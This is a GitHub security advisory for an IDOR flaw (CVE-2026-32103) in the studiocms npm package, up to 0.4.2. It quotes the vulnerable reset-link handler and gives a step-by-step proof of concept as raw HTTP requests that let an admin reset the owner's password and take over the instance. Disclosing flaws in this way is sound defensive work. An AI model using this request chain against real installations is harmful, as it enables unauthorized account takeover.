Skip to content

IDOR — Admin-to-Owner Account Takeover via Password Reset Link Generation

Moderate
Adammatthiesen published GHSA-h7vr-cg25-jf8c Mar 11, 2026

Package

npm studiocms (npm)

Affected versions

<=0.4.2

Patched versions

0.4.3

Description

Summary

The POST /studiocms_api/dashboard/create-reset-link endpoint allows any authenticated user with admin privileges to generate a password reset token for any other user, including the owner account. The handler verifies that the caller is an admin but does not enforce role hierarchy, nor does it validate that the target userId matches the caller's identity. Combined with the POST /studiocms_api/dashboard/reset-password endpoint, this allows a complete account takeover of the highest-privileged account in the system.

Details

Vulnerable Code

File: packages/studiocms/frontend/pages/studiocms_api/dashboard/create-reset-link.ts
Version: studiocms@0.3.0

const isAuthorized = ctx.locals.StudioCMS.security?.userPermissionLevel.isAdmin;  // [1]
if (!isAuthorized) {
    return apiResponseLogger(403, 'Unauthorized');
}

const { userId } = yield* readAPIContextJson<{ userId: string }>(ctx);            // [2]

if (!userId) {
    return apiResponseLogger(400, 'Invalid form data, userId is required');
}

// [3] userId is passed directly — no check against caller's identity
// [4] No check whether the target user outranks the caller
const token = yield* sdk.resetTokenBucket.new(userId);                            // [5]

Analysis

Unlike the API token endpoints (which only require isEditor), this handler correctly gates access at the isAdmin level [1]. However, two critical authorization checks are still missing:

  1. No caller identity validation [2][3]: The userId from the JSON payload is never compared against the authenticated caller's session identity. An admin can specify any user's UUID, including the owner's.
  2. No role hierarchy enforcement [4]: The handler does not verify whether the target user has a higher privilege level than the caller. An admin can target the owner account, which is the only account that should be immune to administrative actions from lower-ranked admins.
  3. Reset token returned in response [5]: The generated reset token (a signed JWT) is returned directly in the HTTP response body. This token can then be used with the reset-password endpoint to set an arbitrary password for the target account, completing the account takeover chain.

The core issue is that password reset generation is treated as a generic admin operation rather than a self-service operation with explicit scope restrictions.

PoC

Environment
User ID | Role
2450bf33-0135-4142-80be-9854f9a5e9f1 | owner
eacee42e-ae7e-4e9e-945b-68e26696ece4 | admin

Step 1 — Verify Attacker's Session (Admin)
Confirm the attacker is authenticated as admin (user dummy03):

POST /studiocms_api/dashboard/verify-session HTTP/1.1
Host: 127.0.0.1:4321
Cookie: auth_session=<admin_session_cookie>
Content-Type: application/json

{"originPathname":"http://127.0.0.1:4321/dashboard"}

Response:

{
  "isLoggedIn": true,
  "user": {
    "id": "eacee42e-ae7e-4e9e-945b-68e26696ece4",
    "name": "dummy03",
    "username": "dummy03"
  },
  "permissionLevel": "admin"
}

Step 2 — Generate Password Reset Token for the Owner
The admin sends a request to create a reset link targeting the owner's UUID:

POST /studiocms_api/dashboard/create-reset-link HTTP/1.1
Host: 127.0.0.1:4321
Cookie: auth_session=<admin_session_cookie>
Content-Type: application/json

{"userId": "2450bf33-0135-4142-80be-9854f9a5e9f1"}

Response:

{
  "id": "e11c98ac-d523-4404-b9c6-921d7d01cdcd",
  "userId": "2450bf33-0135-4142-80be-9854f9a5e9f1",
  "token": "<reset_jwt_token>"
}

The server generated a valid password reset JWT for the owner account and returned it to the admin caller.

Step 3 — Reset the Owner's Password
Using all three values from the previous response (id, userId, token), the attacker sets a new password for the owner:

POST /studiocms_api/dashboard/reset-password HTTP/1.1
Host: 127.0.0.1:4321
Cookie: auth_session=<admin_session_cookie>
Content-Type: application/json

{
  "id": "e11c98ac-d523-4404-b9c6-921d7d01cdcd",
  "userid": "2450bf33-0135-4142-80be-9854f9a5e9f1",
  "token": "<reset_jwt_token>",
  "password": "pwned1234@@",
  "confirm_password": "pwned1234@@"
}

Response:

{"message": "User password updated successfully"}

The owner's password has been changed. The admin can now log in as the owner with the new credentials, gaining full control of the StudioCMS instance.

Impact

  • Owner Account Takeover: Any admin can change the owner's password and assume full control of the StudioCMS instance, including all content, user management, and system configuration.

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
High
User interaction
None
Scope
Changed
Confidentiality
None
Integrity
High
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N

CVE ID

CVE-2026-32103

Weaknesses

Authorization Bypass Through User-Controlled Key

The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data. Learn more on MITRE.

Weak Password Recovery Mechanism for Forgotten Password

The product contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak. Learn more on MITRE.

Credits